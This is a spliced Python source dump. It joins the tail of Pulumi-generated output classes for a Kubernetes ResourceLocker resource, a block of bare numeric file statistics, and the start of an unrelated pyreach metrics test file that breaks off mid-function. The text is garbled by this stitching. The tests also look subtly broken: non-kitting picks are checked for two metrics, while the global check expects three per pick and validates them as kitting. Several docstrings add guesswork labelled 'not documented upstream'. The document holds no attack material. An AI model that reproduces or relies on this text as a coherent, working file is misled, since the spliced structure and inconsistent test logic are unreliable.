        ResourceLockerSpec defines the desired state of ResourceLocker
        :param Sequence['ResourceLockerSpecPatchesArgs'] patches: Patches is a list of patches that should be enforced at runtime.
        :param Sequence['ResourceLockerSpecResourcesArgs'] resources: Resources is a list of resource manifests that should be locked into the specified configuration
        :param 'ResourceLockerSpecServiceAccountRefArgs' service_account_ref: ServiceAccountRef is the service account to be used to run the controllers associated with this configuration kubebuilder:default:="{Name: "default"}"
        """
        # Only store fields that were actually supplied, so omitted optional
        # fields are absent from the underlying dict rather than None.
        if patches is not None:
            pulumi.set(__self__, "patches", patches)
        if resources is not None:
            pulumi.set(__self__, "resources", resources)
        if service_account_ref is not None:
            pulumi.set(__self__, "service_account_ref", service_account_ref)
    @property
    @pulumi.getter
    def patches(self) -> Optional[Sequence['outputs.ResourceLockerSpecPatches']]:
        """
        Patches is a list of patches that should be enforced at runtime.
        """
        return pulumi.get(self, "patches")
    @property
    @pulumi.getter
    def resources(self) -> Optional[Sequence['outputs.ResourceLockerSpecResources']]:
        """
        Resources is a list of resource manifests that should be locked into the specified configuration
        """
        return pulumi.get(self, "resources")
    @property
    # The wire name is camelCase; the getter maps it to the snake_case attr.
    @pulumi.getter(name="serviceAccountRef")
    def service_account_ref(self) -> Optional['outputs.ResourceLockerSpecServiceAccountRef']:
        """
        ServiceAccountRef is the service account to be used to run the controllers associated with this configuration kubebuilder:default:="{Name: "default"}"
        """
        return pulumi.get(self, "service_account_ref")
    def _translate_property(self, prop):
        # Fall back to the property name itself when no camelCase-to-snake_case
        # mapping exists in the generated translation table.
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ResourceLockerSpecPatches(dict):
    """
    Patch describe a patch to be enforced at runtime
    """
    def __init__(__self__, *,
                 id: str,
                 patch_template: str,
                 target_object_ref: 'outputs.ResourceLockerSpecPatchesTargetObjectRef',
                 patch_type: Optional[str] = None,
                 source_object_refs: Optional[Sequence['outputs.ResourceLockerSpecPatchesSourceObjectRefs']] = None):
        """
        Patch describe a patch to be enforced at runtime
        :param str id: ID represent a unique identifier for the patch in the array of patches oc this CR
        :param str patch_template: PatchTemplate is a go template that will be resolved using the SourceObjectRefs as parameters. The result must be a valid patch based on the patch type and the target object.
        :param 'ResourceLockerSpecPatchesTargetObjectRefArgs' target_object_ref: TargetObjectRef is a reference to the object to which the patch should be applied.
        :param str patch_type: PatchType is the type of patch to be applied, one of "application/json-patch+json"'"application/merge-patch+json","application/strategic-merge-patch+json","application/apply-patch+yaml" kubebuilder:default:="application/strategic-merge-patch+json"
        :param Sequence['ResourceLockerSpecPatchesSourceObjectRefsArgs'] source_object_refs: SourceObject refs is an array of references to source objects that will be used as input for the template processing
        """
        # Required fields are always stored; optional fields only when given,
        # so they are absent from the underlying dict rather than None.
        pulumi.set(__self__, "id", id)
        pulumi.set(__self__, "patch_template", patch_template)
        pulumi.set(__self__, "target_object_ref", target_object_ref)
        if patch_type is not None:
            pulumi.set(__self__, "patch_type", patch_type)
        if source_object_refs is not None:
            pulumi.set(__self__, "source_object_refs", source_object_refs)
    @property
    @pulumi.getter
    def id(self) -> str:
        """
        ID represent a unique identifier for the patch in the array of patches oc this CR
        """
        return pulumi.get(self, "id")
    @property
    @pulumi.getter(name="patchTemplate")
    def patch_template(self) -> str:
        """
        PatchTemplate is a go template that will be resolved using the SourceObjectRefs as parameters. The result must be a valid patch based on the patch type and the target object.
        """
        return pulumi.get(self, "patch_template")
    @property
    @pulumi.getter(name="targetObjectRef")
    def target_object_ref(self) -> 'outputs.ResourceLockerSpecPatchesTargetObjectRef':
        """
        TargetObjectRef is a reference to the object to which the patch should be applied.
        """
        return pulumi.get(self, "target_object_ref")
    @property
    @pulumi.getter(name="patchType")
    def patch_type(self) -> Optional[str]:
        """
        PatchType is the type of patch to be applied, one of "application/json-patch+json"'"application/merge-patch+json","application/strategic-merge-patch+json","application/apply-patch+yaml" kubebuilder:default:="application/strategic-merge-patch+json"
        """
        return pulumi.get(self, "patch_type")
    @property
    @pulumi.getter(name="sourceObjectRefs")
    def source_object_refs(self) -> Optional[Sequence['outputs.ResourceLockerSpecPatchesSourceObjectRefs']]:
        """
        SourceObject refs is an array of references to source objects that will be used as input for the template processing
        """
        return pulumi.get(self, "source_object_refs")
    def _translate_property(self, prop):
        # Fall back to the property name itself when no camelCase-to-snake_case
        # mapping exists in the generated translation table.
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ResourceLockerSpecPatchesSourceObjectRefs(dict):
    """
    A reference to a source object used as input for patch template processing.

    Mirrors the Kubernetes core ObjectReference shape: every field is
    optional, and only apiVersion/kind/name/namespace are commonly honored;
    fieldPath, resourceVersion, and uid are rarely meaningful in practice.
    Upstream Kubernetes discourages embedding this underspecified type in
    new APIs (see kubernetes/api release-1.17 admissionregistration notes).
    """

    def __init__(__self__, *,
                 api_version: Optional[str] = None,
                 field_path: Optional[str] = None,
                 kind: Optional[str] = None,
                 name: Optional[str] = None,
                 namespace: Optional[str] = None,
                 uid: Optional[str] = None,
                 resource_version: Optional[str] = None):
        """
        :param str api_version: API version of the referent.
        :param str field_path: JSON/Go field access path inside the referent
               (e.g. ``spec.containers{name}``); only used when referring to
               part of an object rather than the whole object.
        :param str kind: Kind of the referent.
        :param str name: Name of the referent.
        :param str namespace: Namespace of the referent.
        :param str uid: UID of the referent.
        :param str resource_version: Specific resourceVersion to which this
               reference is made, if any.
        """
        # Record only the fields that were explicitly supplied.
        for attr, value in (
                ("api_version", api_version),
                ("field_path", field_path),
                ("kind", kind),
                ("name", name),
                ("namespace", namespace),
                ("resource_version", resource_version),
                ("uid", uid)):
            if value is not None:
                pulumi.set(__self__, attr, value)

    @property
    @pulumi.getter(name="apiVersion")
    def api_version(self) -> Optional[str]:
        """API version of the referent."""
        return pulumi.get(self, "api_version")

    @property
    @pulumi.getter(name="fieldPath")
    def field_path(self) -> Optional[str]:
        """Field access path within the referent, when referring to a sub-object."""
        return pulumi.get(self, "field_path")

    @property
    @pulumi.getter
    def kind(self) -> Optional[str]:
        """Kind of the referent."""
        return pulumi.get(self, "kind")

    @property
    @pulumi.getter
    def name(self) -> Optional[str]:
        """Name of the referent."""
        return pulumi.get(self, "name")

    @property
    @pulumi.getter
    def namespace(self) -> Optional[str]:
        """Namespace of the referent."""
        return pulumi.get(self, "namespace")

    @property
    @pulumi.getter(name="resourceVersion")
    def resource_version(self) -> Optional[str]:
        """Specific resourceVersion to which this reference is made, if any."""
        return pulumi.get(self, "resource_version")

    @property
    @pulumi.getter
    def uid(self) -> Optional[str]:
        """UID of the referent."""
        return pulumi.get(self, "uid")

    def _translate_property(self, prop):
        # Map a camelCase wire property name to its snake_case form.
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ResourceLockerSpecPatchesTargetObjectRef(dict):
    """
    TargetObjectRef is a reference to the object to which the patch should
    be applied.

    Mirrors the Kubernetes core ObjectReference shape: every field is
    optional, and only apiVersion/kind/name/namespace are commonly honored;
    fieldPath, resourceVersion, and uid are rarely meaningful in practice.
    """

    def __init__(__self__, *,
                 api_version: Optional[str] = None,
                 field_path: Optional[str] = None,
                 kind: Optional[str] = None,
                 name: Optional[str] = None,
                 namespace: Optional[str] = None,
                 uid: Optional[str] = None,
                 resource_version: Optional[str] = None):
        """
        :param str api_version: API version of the referent.
        :param str field_path: JSON/Go field access path inside the referent
               (e.g. ``spec.containers{name}``); only used when referring to
               part of an object rather than the whole object.
        :param str kind: Kind of the referent.
        :param str name: Name of the referent.
        :param str namespace: Namespace of the referent.
        :param str uid: UID of the referent.
        :param str resource_version: Specific resourceVersion to which this
               reference is made, if any.
        """
        # Record only the fields that were explicitly supplied.
        for attr, value in (
                ("api_version", api_version),
                ("field_path", field_path),
                ("kind", kind),
                ("name", name),
                ("namespace", namespace),
                ("resource_version", resource_version),
                ("uid", uid)):
            if value is not None:
                pulumi.set(__self__, attr, value)

    @property
    @pulumi.getter(name="apiVersion")
    def api_version(self) -> Optional[str]:
        """API version of the referent."""
        return pulumi.get(self, "api_version")

    @property
    @pulumi.getter(name="fieldPath")
    def field_path(self) -> Optional[str]:
        """Field access path within the referent, when referring to a sub-object."""
        return pulumi.get(self, "field_path")

    @property
    @pulumi.getter
    def kind(self) -> Optional[str]:
        """Kind of the referent."""
        return pulumi.get(self, "kind")

    @property
    @pulumi.getter
    def name(self) -> Optional[str]:
        """Name of the referent."""
        return pulumi.get(self, "name")

    @property
    @pulumi.getter
    def namespace(self) -> Optional[str]:
        """Namespace of the referent."""
        return pulumi.get(self, "namespace")

    @property
    @pulumi.getter(name="resourceVersion")
    def resource_version(self) -> Optional[str]:
        """Specific resourceVersion to which this reference is made, if any."""
        return pulumi.get(self, "resource_version")

    @property
    @pulumi.getter
    def uid(self) -> Optional[str]:
        """UID of the referent."""
        return pulumi.get(self, "uid")

    def _translate_property(self, prop):
        # Map a camelCase wire property name to its snake_case form.
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ResourceLockerSpecResources(dict):
    """
    Resource represents a resource to be enforced.
    """

    def __init__(__self__, *,
                 object: Mapping[str, Any],
                 excluded_paths: Optional[Sequence[str]] = None):
        """
        :param Mapping[str, Any] object: The resource to enforce. (The
               parameter name shadows the ``object`` builtin but is fixed by
               the generated API schema.)
        :param Sequence[str] excluded_paths: Presumably paths within the
               resource excluded from enforcement — not documented upstream.
        """
        # ``object`` is required; ``excluded_paths`` is stored only when given.
        pulumi.set(__self__, "object", object)
        if excluded_paths is not None:
            pulumi.set(__self__, "excluded_paths", excluded_paths)

    @property
    @pulumi.getter
    def object(self) -> Mapping[str, Any]:
        """The resource being enforced."""
        return pulumi.get(self, "object")

    @property
    @pulumi.getter(name="excludedPaths")
    def excluded_paths(self) -> Optional[Sequence[str]]:
        """Presumably paths excluded from enforcement — not documented upstream."""
        return pulumi.get(self, "excluded_paths")

    def _translate_property(self, prop):
        # Map a camelCase wire property name to its snake_case form.
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ResourceLockerSpecServiceAccountRef(dict):
    """
    ServiceAccountRef is the service account to be used to run the
    controllers associated with this configuration.
    kubebuilder:default:="{Name: "default"}"
    """

    def __init__(__self__, *,
                 name: Optional[str] = None):
        """
        :param str name: Name of the referent.
        """
        # Only store the name when one was explicitly provided.
        if name is not None:
            pulumi.set(__self__, "name", name)

    @property
    @pulumi.getter
    def name(self) -> Optional[str]:
        """Name of the referent."""
        return pulumi.get(self, "name")

    def _translate_property(self, prop):
        # Map a camelCase wire property name to its snake_case form.
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ResourceLockerStatus(dict):
    """
    ResourceLockerStatus defines the observed state of ResourceLocker.
    """

    def __init__(__self__, *,
                 conditions: Optional[Sequence['outputs.ResourceLockerStatusConditions']] = None,
                 locked_patch_statuses: Optional[Mapping[str, Sequence['outputs.ResourceLockerStatusLockedPatchStatuses']]] = None,
                 locked_resource_statuses: Optional[Mapping[str, Sequence['outputs.ResourceLockerStatusLockedResourceStatuses']]] = None):
        """
        :param conditions: General status of the main reconciler.
        :param locked_patch_statuses: Reconcile status for each of the
               managed patches.
        :param locked_resource_statuses: Reconcile status for each of the
               managed resources.
        """
        # Store only the status sections that are present.
        for attr, value in (
                ("conditions", conditions),
                ("locked_patch_statuses", locked_patch_statuses),
                ("locked_resource_statuses", locked_resource_statuses)):
            if value is not None:
                pulumi.set(__self__, attr, value)

    @property
    @pulumi.getter
    def conditions(self) -> Optional[Sequence['outputs.ResourceLockerStatusConditions']]:
        """General status of the main reconciler."""
        return pulumi.get(self, "conditions")

    @property
    @pulumi.getter(name="lockedPatchStatuses")
    def locked_patch_statuses(self) -> Optional[Mapping[str, Sequence['outputs.ResourceLockerStatusLockedPatchStatuses']]]:
        """Reconcile status for each of the managed patches."""
        return pulumi.get(self, "locked_patch_statuses")

    @property
    @pulumi.getter(name="lockedResourceStatuses")
    def locked_resource_statuses(self) -> Optional[Mapping[str, Sequence['outputs.ResourceLockerStatusLockedResourceStatuses']]]:
        """Reconcile status for each of the managed resources."""
        return pulumi.get(self, "locked_resource_statuses")

    def _translate_property(self, prop):
        # Map a camelCase wire property name to its snake_case form.
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ResourceLockerStatusConditions(dict):
    """
    A Kubernetes-style Condition: an observation of an object's state.

    Conditions explicitly convey properties that users and components care
    about, instead of requiring them to be inferred from other observations.
    Once defined, a Condition's meaning is part of the API and carries the
    same backwards/forwards-compatibility concerns as any other part of it.
    """

    def __init__(__self__, *,
                 status: str,
                 type: str,
                 last_transition_time: Optional[str] = None,
                 message: Optional[str] = None,
                 reason: Optional[str] = None):
        """
        :param str status: Status of the condition.
        :param str type: ConditionType: a CamelCased word or short phrase,
               stated in "abnormal-true" polarity (e.g. "Invalid").
        :param str last_transition_time: Presumably the time the condition
               last changed — not documented upstream.
        :param str message: Presumably human-readable detail — not
               documented upstream.
        :param str reason: ConditionReason: a one-word CamelCase category of
               the cause of the current status, for concise output.
        """
        # status and type are required; the rest are stored only when given.
        pulumi.set(__self__, "status", status)
        pulumi.set(__self__, "type", type)
        for attr, value in (
                ("last_transition_time", last_transition_time),
                ("message", message),
                ("reason", reason)):
            if value is not None:
                pulumi.set(__self__, attr, value)

    @property
    @pulumi.getter
    def status(self) -> str:
        """Status of the condition."""
        return pulumi.get(self, "status")

    @property
    @pulumi.getter
    def type(self) -> str:
        """
        ConditionType: a CamelCased word or short phrase naming the
        condition, stated in "abnormal-true" polarity (e.g. "Invalid").
        """
        return pulumi.get(self, "type")

    @property
    @pulumi.getter(name="lastTransitionTime")
    def last_transition_time(self) -> Optional[str]:
        """Presumably the time the condition last changed — not documented upstream."""
        return pulumi.get(self, "last_transition_time")

    @property
    @pulumi.getter
    def message(self) -> Optional[str]:
        """Presumably human-readable detail for the condition — not documented upstream."""
        return pulumi.get(self, "message")

    @property
    @pulumi.getter
    def reason(self) -> Optional[str]:
        """
        ConditionReason: a one-word CamelCase category of the cause of the
        current status, intended for concise output.
        """
        return pulumi.get(self, "reason")

    def _translate_property(self, prop):
        # Map a camelCase wire property name to its snake_case form.
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ResourceLockerStatusLockedPatchStatuses(dict):
    """
    A Kubernetes-style Condition: an observation of an object's state.

    Conditions explicitly convey properties that users and components care
    about, instead of requiring them to be inferred from other observations.
    Once defined, a Condition's meaning is part of the API and carries the
    same backwards/forwards-compatibility concerns as any other part of it.
    """

    def __init__(__self__, *,
                 status: str,
                 type: str,
                 last_transition_time: Optional[str] = None,
                 message: Optional[str] = None,
                 reason: Optional[str] = None):
        """
        :param str status: Status of the condition.
        :param str type: ConditionType: a CamelCased word or short phrase,
               stated in "abnormal-true" polarity (e.g. "Invalid").
        :param str last_transition_time: Presumably the time the condition
               last changed — not documented upstream.
        :param str message: Presumably human-readable detail — not
               documented upstream.
        :param str reason: ConditionReason: a one-word CamelCase category of
               the cause of the current status, for concise output.
        """
        # status and type are required; the rest are stored only when given.
        pulumi.set(__self__, "status", status)
        pulumi.set(__self__, "type", type)
        for attr, value in (
                ("last_transition_time", last_transition_time),
                ("message", message),
                ("reason", reason)):
            if value is not None:
                pulumi.set(__self__, attr, value)

    @property
    @pulumi.getter
    def status(self) -> str:
        """Status of the condition."""
        return pulumi.get(self, "status")

    @property
    @pulumi.getter
    def type(self) -> str:
        """
        ConditionType: a CamelCased word or short phrase naming the
        condition, stated in "abnormal-true" polarity (e.g. "Invalid").
        """
        return pulumi.get(self, "type")

    @property
    @pulumi.getter(name="lastTransitionTime")
    def last_transition_time(self) -> Optional[str]:
        """Presumably the time the condition last changed — not documented upstream."""
        return pulumi.get(self, "last_transition_time")

    @property
    @pulumi.getter
    def message(self) -> Optional[str]:
        """Presumably human-readable detail for the condition — not documented upstream."""
        return pulumi.get(self, "message")

    @property
    @pulumi.getter
    def reason(self) -> Optional[str]:
        """
        ConditionReason: a one-word CamelCase category of the cause of the
        current status, intended for concise output.
        """
        return pulumi.get(self, "reason")

    def _translate_property(self, prop):
        # Map a camelCase wire property name to its snake_case form.
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ResourceLockerStatusLockedResourceStatuses(dict):
    """
    A Kubernetes-style Condition: an observation of an object's state.

    Conditions explicitly convey properties that users and components care
    about, instead of requiring them to be inferred from other observations.
    Once defined, a Condition's meaning is part of the API and carries the
    same backwards/forwards-compatibility concerns as any other part of it.
    """

    def __init__(__self__, *,
                 status: str,
                 type: str,
                 last_transition_time: Optional[str] = None,
                 message: Optional[str] = None,
                 reason: Optional[str] = None):
        """
        :param str status: Status of the condition.
        :param str type: ConditionType: a CamelCased word or short phrase,
               stated in "abnormal-true" polarity (e.g. "Invalid").
        :param str last_transition_time: Presumably the time the condition
               last changed — not documented upstream.
        :param str message: Presumably human-readable detail — not
               documented upstream.
        :param str reason: ConditionReason: a one-word CamelCase category of
               the cause of the current status, for concise output.
        """
        # status and type are required; the rest are stored only when given.
        pulumi.set(__self__, "status", status)
        pulumi.set(__self__, "type", type)
        for attr, value in (
                ("last_transition_time", last_transition_time),
                ("message", message),
                ("reason", reason)):
            if value is not None:
                pulumi.set(__self__, attr, value)

    @property
    @pulumi.getter
    def status(self) -> str:
        """Status of the condition."""
        return pulumi.get(self, "status")

    @property
    @pulumi.getter
    def type(self) -> str:
        """
        ConditionType: a CamelCased word or short phrase naming the
        condition, stated in "abnormal-true" polarity (e.g. "Invalid").
        """
        return pulumi.get(self, "type")

    @property
    @pulumi.getter(name="lastTransitionTime")
    def last_transition_time(self) -> Optional[str]:
        """Presumably the time the condition last changed — not documented upstream."""
        return pulumi.get(self, "last_transition_time")

    @property
    @pulumi.getter
    def message(self) -> Optional[str]:
        """Presumably human-readable detail for the condition — not documented upstream."""
        return pulumi.get(self, "message")

    @property
    @pulumi.getter
    def reason(self) -> Optional[str]:
        """
        ConditionReason: a one-word CamelCase category of the cause of the
        current status, intended for concise output.
        """
        return pulumi.get(self, "reason")

    def _translate_property(self, prop):
        # Map a camelCase wire property name to its snake_case form.
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
| 58.345853
| 1,601
| 0.702465
| 4,846
| 37,283
| 5.30066
| 0.090384
| 0.012458
| 0.021762
| 0.031806
| 0.853
| 0.846888
| 0.830537
| 0.81512
| 0.812318
| 0.809203
| 0
| 0.002127
| 0.218303
| 37,283
| 638
| 1,602
| 58.437304
| 0.879255
| 0.552987
| 0
| 0.72702
| 1
| 0
| 0.137126
| 0.070832
| 0
| 0
| 0
| 0.009404
| 0
| 1
| 0.175487
| false
| 0
| 0.016713
| 0.058496
| 0.367688
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
26d04e4c4398f82fd8b7b98098ace6db9916127e
| 18,128
|
py
|
Python
|
pyreach/impl/metrics_impl_test.py
|
google-research/pyreach
|
f91753ce7a26e77e122eb02a9fdd5a1ce3ce0159
|
[
"Apache-2.0"
] | 13
|
2021-09-01T01:10:22.000Z
|
2022-03-05T10:01:52.000Z
|
pyreach/impl/metrics_impl_test.py
|
google-research/pyreach
|
f91753ce7a26e77e122eb02a9fdd5a1ce3ce0159
|
[
"Apache-2.0"
] | null | null | null |
pyreach/impl/metrics_impl_test.py
|
google-research/pyreach
|
f91753ce7a26e77e122eb02a9fdd5a1ce3ce0159
|
[
"Apache-2.0"
] | 6
|
2021-09-20T21:17:53.000Z
|
2022-03-14T18:42:48.000Z
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for metrics implementation."""
from typing import List, Tuple, Union
import unittest
from pyreach import metrics
from pyreach.common.python import types_gen
from pyreach.impl import metrics_impl
from pyreach.impl import test_utils
from pyreach.impl import thread_util
class MetricsTest(unittest.TestCase):
  def test_metrics_test(self) -> None:
    """Checks the TestMetrics responder used by the other tests.

    Drives the responder with a single "test-metric" reach-script command
    and expects three metric DeviceData replies: a "float-key" metric and a
    "test-metric" metric labeled with intent "pick", plus a "test-metric"
    metric labeled with intent "kitting".
    """
    test_utils.run_test_client_test([TestMetrics()], [
        test_utils.TestResponderStep(
            # Command sent to the responder.
            types_gen.CommandData(
                ts=1,
                device_type="robot",
                data_type="reach-script",
                pick_id="test-pick-id",
                cmd="test-metric"),
            # Expected replies, in order.
            (types_gen.DeviceData(
                ts=1,
                seq=11,
                device_type="server",
                data_type="metric",
                metric_value=types_gen.KeyValue(
                    key="float-key", float_value=1.0),
                labels=[
                    types_gen.KeyValue(
                        key="test-label", value="test-float-value"),
                    types_gen.KeyValue(key="pick_id", value="test-pick-id"),
                    types_gen.KeyValue(key="intent", value="pick")
                ],
                event_params=[
                    types_gen.KeyValue(
                        key="test-event", value="test-float-value")
                ],
            ),
             # Same labels/params as above, but keyed by the command name.
             types_gen.DeviceData(
                 ts=1,
                 seq=12,
                 device_type="server",
                 data_type="metric",
                 metric_value=types_gen.KeyValue(
                     key="test-metric", float_value=1.0),
                 labels=[
                     types_gen.KeyValue(
                         key="test-label", value="test-float-value"),
                     types_gen.KeyValue(key="pick_id", value="test-pick-id"),
                     types_gen.KeyValue(key="intent", value="pick")
                 ],
                 event_params=[
                     types_gen.KeyValue(
                         key="test-event", value="test-float-value")
                 ],
             ),
             # Kitting-intent variant of the "test-metric" metric.
             types_gen.DeviceData(
                 ts=1,
                 seq=13,
                 device_type="server",
                 data_type="metric",
                 metric_value=types_gen.KeyValue(
                     key="test-metric", float_value=2.0),
                 labels=[
                     types_gen.KeyValue(key="test-label", value="test-kitting"),
                     types_gen.KeyValue(key="pick_id", value="test-pick-id"),
                     types_gen.KeyValue(key="intent", value="kitting")
                 ],
                 event_params=[
                     types_gen.KeyValue(key="test-event", value="test-kitting")
                 ],
             )))
    ])
  def test_metrics(self) -> None:
    """Exercises MetricDevice pick flows with the default (None) intent.

    For each of the four operator outcome commands (success, pick_success,
    failure, pick_failure): starts a pick, sends the command through the
    test device, and validates the metrics seen via wait(), the per-pick
    callback capturer, and get_metric(). Then verifies that a pick started
    with a 0.0 second argument (presumably a timeout — see start_pick)
    produces no metrics, and that the global update callback saw all 12
    metric messages, three per pick, in order.
    """
    rdev, dev = metrics_impl.MetricDevice().get_wrapper()
    with test_utils.TestDevice(rdev) as test_device:
      test_device.set_responder(TestMetrics())
      # Captures every metric update across the whole test.
      global_capturer: "thread_util.CallbackCapturer[metrics.Metric]"
      global_capturer = thread_util.CallbackCapturer()
      stop = dev.add_update_callback(global_capturer.callback_false,
                                     global_capturer.finished_callback)
      # Per-pick capturer; recreated before each pick below.
      capturer: "thread_util.CallbackCapturer[metrics.Metric]"
      capturer = thread_util.CallbackCapturer()
      pick_id_0, wait = dev.start_pick(None, None, capturer.callback_false,
                                       capturer.finished_callback)
      test_device.send_cmd(
          types_gen.CommandData(
              ts=1,
              device_type="robot",
              data_type="reach-script",
              pick_id=pick_id_0,
              cmd="operator/success"))

      def get_metric(key: str) -> metrics.Metric:
        # Fetch a metric by key, asserting that it exists.
        metric = dev.get_metric(key)
        self.assertIsNotNone(metric)
        assert metric
        return metric

      self._validate_metrics("operator/success", pick_id_0, wait())
      self._validate_metrics("operator/success", pick_id_0, capturer.wait())
      self._validate_metric_float(pick_id_0, get_metric("float-key"))
      self._validate_metric_kitting("operator/success", pick_id_0,
                                    get_metric("operator/success"))
      # Second pick: operator/pick_success.
      capturer = thread_util.CallbackCapturer()
      pick_id_1, wait = dev.start_pick(None, None, capturer.callback_false,
                                       capturer.finished_callback)
      test_device.send_cmd(
          types_gen.CommandData(
              ts=1,
              device_type="robot",
              data_type="reach-script",
              pick_id=pick_id_1,
              cmd="operator/pick_success"))
      self._validate_metrics("operator/pick_success", pick_id_1, wait())
      self._validate_metrics("operator/pick_success", pick_id_1,
                             capturer.wait())
      self._validate_metric_float(pick_id_1, get_metric("float-key"))
      self._validate_metric_kitting("operator/pick_success", pick_id_1,
                                    get_metric("operator/pick_success"))
      # Third pick: operator/failure.
      capturer = thread_util.CallbackCapturer()
      pick_id_2, wait = dev.start_pick(None, None, capturer.callback_false,
                                       capturer.finished_callback)
      test_device.send_cmd(
          types_gen.CommandData(
              ts=1,
              device_type="robot",
              data_type="reach-script",
              pick_id=pick_id_2,
              cmd="operator/failure"))
      self._validate_metrics("operator/failure", pick_id_2, wait())
      self._validate_metrics("operator/failure", pick_id_2, capturer.wait())
      self._validate_metric_float(pick_id_2, get_metric("float-key"))
      self._validate_metric_kitting("operator/failure", pick_id_2,
                                    get_metric("operator/failure"))
      # Fourth pick: operator/pick_failure.
      capturer = thread_util.CallbackCapturer()
      pick_id_3, wait = dev.start_pick(None, None, capturer.callback_false,
                                       capturer.finished_callback)
      test_device.send_cmd(
          types_gen.CommandData(
              ts=1,
              device_type="robot",
              data_type="reach-script",
              pick_id=pick_id_3,
              cmd="operator/pick_failure"))
      self._validate_metrics("operator/pick_failure", pick_id_3, wait())
      self._validate_metrics("operator/pick_failure", pick_id_3,
                             capturer.wait())
      self._validate_metric_float(pick_id_3, get_metric("float-key"))
      self._validate_metric_kitting("operator/pick_failure", pick_id_3,
                                    get_metric("operator/pick_failure"))
      # A pick started with 0.0 (and no command sent) yields no metrics.
      capturer = thread_util.CallbackCapturer()
      _, wait = dev.start_pick(None, 0.0, capturer.callback_false,
                               capturer.finished_callback)
      self.assertEqual(len(wait()), 0)
      self.assertEqual(len(capturer.wait()), 0)
      # Stop the global callback and check it saw 3 messages per pick.
      stop()
      msgs = global_capturer.wait()
      self.assertEqual(len(msgs), 12)
      self._validate_metrics("operator/success", pick_id_0, msgs[0:3], True)
      self._validate_metrics("operator/pick_success", pick_id_1, msgs[3:6],
                             True)
      self._validate_metrics("operator/failure", pick_id_2, msgs[6:9], True)
      self._validate_metrics("operator/pick_failure", pick_id_3, msgs[9:12],
                             True)
def test_metrics_kitting(self) -> None:
    """End-to-end kitting pick flow: one pick per exit command.

    For each exit command, starts a kitting pick, injects the matching
    reach-script command, and validates the three metrics (float, exit,
    kitting) both from the wait() result and the callback capturer. A
    final zero-timeout pick must produce no metrics at all.
    """
    rdev, dev = metrics_impl.MetricDevice().get_wrapper()
    with test_utils.TestDevice(rdev) as test_device:
        test_device.set_responder(TestMetrics())
        global_capturer: "thread_util.CallbackCapturer[metrics.Metric]"
        global_capturer = thread_util.CallbackCapturer()
        stop = dev.add_update_callback(global_capturer.callback_false,
                                       global_capturer.finished_callback)

        def get_metric(key: str) -> metrics.Metric:
            # Fetch a metric by key and fail fast if it is missing.
            metric = dev.get_metric(key)
            self.assertIsNotNone(metric)
            assert metric
            return metric

        exit_cmds = [
            "operator/success",
            "operator/pick_success",
            "operator/failure",
            "operator/pick_failure",
        ]
        pick_ids = []
        for exit_cmd in exit_cmds:
            capturer: "thread_util.CallbackCapturer[metrics.Metric]"
            capturer = thread_util.CallbackCapturer()
            pick_id, wait = dev.start_pick("kitting", None,
                                           capturer.callback_false,
                                           capturer.finished_callback)
            pick_ids.append(pick_id)
            test_device.send_cmd(
                types_gen.CommandData(
                    ts=1,
                    device_type="robot",
                    data_type="reach-script",
                    pick_id=pick_id,
                    cmd=exit_cmd))
            self._validate_metrics(exit_cmd, pick_id, wait(), True)
            self._validate_metrics(exit_cmd, pick_id, capturer.wait(), True)
            self._validate_metric_float(pick_id, get_metric("float-key"))
            self._validate_metric_kitting(exit_cmd, pick_id,
                                          get_metric(exit_cmd))

        # A pick with a 0.0 timeout expires immediately: no metrics.
        capturer = thread_util.CallbackCapturer()
        _, wait = dev.start_pick("kitting", 0.0, capturer.callback_false,
                                 capturer.finished_callback)
        self.assertEqual(len(wait()), 0)
        self.assertEqual(len(capturer.wait()), 0)
        stop()
        # The global capturer saw all four picks: three metrics each.
        msgs = global_capturer.wait()
        self.assertEqual(len(msgs), 12)
        for index, exit_cmd in enumerate(exit_cmds):
            self._validate_metrics(exit_cmd, pick_ids[index],
                                   msgs[index * 3:index * 3 + 3], True)
def _validate_metrics(self,
                      exit_key: str,
                      pick_id: str,
                      metrics_msgs: Union[List[metrics.Metric],
                                          Tuple[metrics.Metric, ...]],
                      kitting: bool = False) -> None:
    """Validates the ordered metrics produced by a single pick.

    Args:
      exit_key: expected key of the exit metric (e.g. "operator/success").
      pick_id: pick id the metrics' "pick_id" label must carry.
      metrics_msgs: the captured metrics, in emission order — float metric
        first, then the exit metric, then (kitting only) the kitting metric.
      kitting: whether a third, kitting-specific metric is expected.
    """
    self.assertEqual(len(metrics_msgs), 3 if kitting else 2)
    self._validate_metric_float(pick_id, metrics_msgs[0])
    self.assertEqual(metrics_msgs[1].key, exit_key)
    self.assertEqual(metrics_msgs[1].float_value, 1.0)
    self.assertEqual(metrics_msgs[1].sequence, 12)
    self.assertEqual(len(metrics_msgs[1].labels), 3)
    self.assertEqual(metrics_msgs[1].labels[0][0], "test-label")
